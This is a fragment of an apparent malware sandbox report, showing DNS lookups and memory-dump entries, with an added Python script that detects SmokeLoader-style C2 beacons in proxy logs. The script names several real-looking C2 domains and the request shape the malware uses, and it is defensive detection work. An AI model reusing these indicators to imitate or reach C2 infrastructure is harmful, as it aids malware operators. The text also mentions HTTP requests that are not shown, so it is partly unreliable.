  • 8.8.8.8:53
    101.51.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    101.51.21.104.in-addr.arpa

  • 8.8.8.8:53
    186.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    186.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    205.47.74.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    205.47.74.20.in-addr.arpa

  • 8.8.8.8:53
    100.5.17.2.in-addr.arpa
    dns
    138 B
    131 B
    2
    1

    DNS Request

    100.5.17.2.in-addr.arpa

    DNS Request

    100.5.17.2.in-addr.arpa

  • 8.8.8.8:53
    119.110.54.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    119.110.54.20.in-addr.arpa

  • 8.8.8.8:53
    30.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    30.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    18.134.221.88.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    18.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    187.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    187.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    80.135.221.88.in-addr.arpa
    dns
    144 B
    137 B
    2
    1

    DNS Request

    80.135.221.88.in-addr.arpa

    DNS Request

    80.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    0.204.248.87.in-addr.arpa
    dns
    142 B
    116 B
    2
    1

    DNS Request

    0.204.248.87.in-addr.arpa

    DNS Request

    0.204.248.87.in-addr.arpa

  • 8.8.8.8:53
    dns
    173 B
    1

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    79.121.231.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    79.121.231.20.in-addr.arpa
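The HTTP requests above share one shape across all five C2 hosts: POST /tmp/ with a small form-urlencoded body (137 to 238 bytes), the hardcoded IE11 "Trident/7.0" User-Agent, and a Referer naming a different, random-looking .com domain on every request while the Host header names the real C2. The following is an added example, not part of the report or of Triage, that turns that shape into a scoring rule run over proxy-log records and then groups hits by client, since one machine walking several C2 domains within seconds (18:34:11 to 18:34:25 here) is a stronger signal than a single POST. The record layout, client addresses, thresholds and the two benign records are constructed for the example; the beacon timestamps approximate the response Dates in the report.

```python
"""Added example (not part of the Triage report): flag SmokeLoader-style C2
beacons in HTTP proxy logs using the request shape seen in the report.

The record layout, client addresses and thresholds below are assumptions made
for the example; map the field names to your proxy's own schema.
"""
from collections import defaultdict
from urllib.parse import urlsplit

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
C2_PATH = "/tmp/"            # path used by every C2 in this sample's config
VOWELS = set("aeiou")


def _beacon(ts, host, referer, clen):
    """Constructed log record shaped like one of the report's C2 POSTs."""
    return {"ts": ts, "src": "10.0.0.5", "method": "POST", "host": host,
            "path": C2_PATH, "referer": referer, "ua": IE11_UA,
            "ctype": "application/x-www-form-urlencoded", "clen": clen}


# Constructed sample log: five beacons reusing the report's hosts, Referers and
# Content-Lengths, followed by two benign records added for contrast.
SAMPLE_RECORDS = [
    _beacon("2024-01-07T18:34:05Z", "dpav.cc", "http://jwatyipdwmeik.com/", 226),
    _beacon("2024-01-07T18:34:11Z", "talesofpirates.net", "http://sohxfuborahxc.com/", 137),
    _beacon("2024-01-07T18:34:20Z", "pirateking.online", "http://pvasducwsnbk.com/", 141),
    _beacon("2024-01-07T18:34:23Z", "piratia.pw", "http://hdyfoqbyrdss.com/", 237),
    _beacon("2024-01-07T18:34:25Z", "go-piratia.ru", "http://lswmwcurwnk.com/", 238),
    {"ts": "2024-01-07T18:35:00Z", "src": "10.0.0.9", "method": "POST", "host": "example.com",
     "path": "/login", "referer": "http://example.com/", "ua": "Mozilla/5.0 Chrome/120.0",
     "ctype": "application/x-www-form-urlencoded", "clen": 80},
    {"ts": "2024-01-07T18:35:10Z", "src": "10.0.0.7", "method": "GET", "host": "files.example.org",
     "path": "/tmp/", "referer": "https://intranet.example.org/docs", "ua": IE11_UA,
     "ctype": "", "clen": 0},
]


def label_looks_random(label: str) -> bool:
    """Heuristic for DGA-like labels: few vowels or a long consonant run."""
    letters = [c for c in label.lower() if c.isalpha()]
    if not letters:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    run = longest = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return vowel_ratio < 0.3 or longest >= 4


def beacon_score(rec: dict) -> int:
    """Score one request against the beacon shape; weights are assumptions."""
    score = 0
    if rec["method"] == "POST" and rec["path"] == C2_PATH:
        score += 2                                  # C2 path from the config
    if rec.get("ua") == IE11_UA:
        score += 1                                  # weak alone: real IE11 sends it too
    if rec.get("ctype") == "application/x-www-form-urlencoded" and rec.get("clen", 0) < 512:
        score += 1                                  # small form body, as in the report
    ref = urlsplit(rec.get("referer", ""))
    if ref.scheme == "http" and ref.path == "/" and ref.hostname and ref.hostname != rec["host"]:
        score += 2                                  # bare Referer naming a different site
        if label_looks_random(ref.hostname.split(".")[0]):
            score += 1
    return score


def find_beacons(records, threshold: int = 5):
    """Records scoring at or above the (assumed) alert threshold."""
    return [r for r in records if beacon_score(r) >= threshold]


def c2_hosts_by_source(hits):
    """Distinct C2 hosts contacted by each client, in first-seen order."""
    by_src = defaultdict(list)
    for r in hits:
        if r["host"] not in by_src[r["src"]]:
            by_src[r["src"]].append(r["host"])
    return dict(by_src)


def sources_walking_c2_list(hits, min_hosts: int = 3):
    """Clients that beaconed to at least min_hosts distinct C2 hosts."""
    return {src: hosts for src, hosts in c2_hosts_by_source(hits).items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(beacon_score(rec), rec["src"], rec["method"], rec["host"], rec["path"])
    print(sources_walking_c2_list(find_beacons(SAMPLE_RECORDS)))
```

The User-Agent is the weakest term in the score because it is a genuine IE11 string; the Referer-to-Host mismatch on a bare "http://<domain>/" Referer and the walk across several C2 hosts from one client are what separate this traffic from an ordinary form submission.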

MITRE ATT&CK Enterprise v15

Downloads

  • memory/3520-4-0x0000000002950000-0x0000000002966000-memory.dmp

    Filesize

    88KB

  • memory/4216-3-0x0000000000400000-0x00000000007C7000-memory.dmp

    Filesize

    3.8MB

  • memory/4216-2-0x0000000002510000-0x000000000251B000-memory.dmp

    Filesize

    44KB

  • memory/4216-1-0x0000000000970000-0x0000000000A70000-memory.dmp

    Filesize

    1024KB

  • memory/4216-5-0x0000000000400000-0x00000000007C7000-memory.dmp

    Filesize

    3.8MB
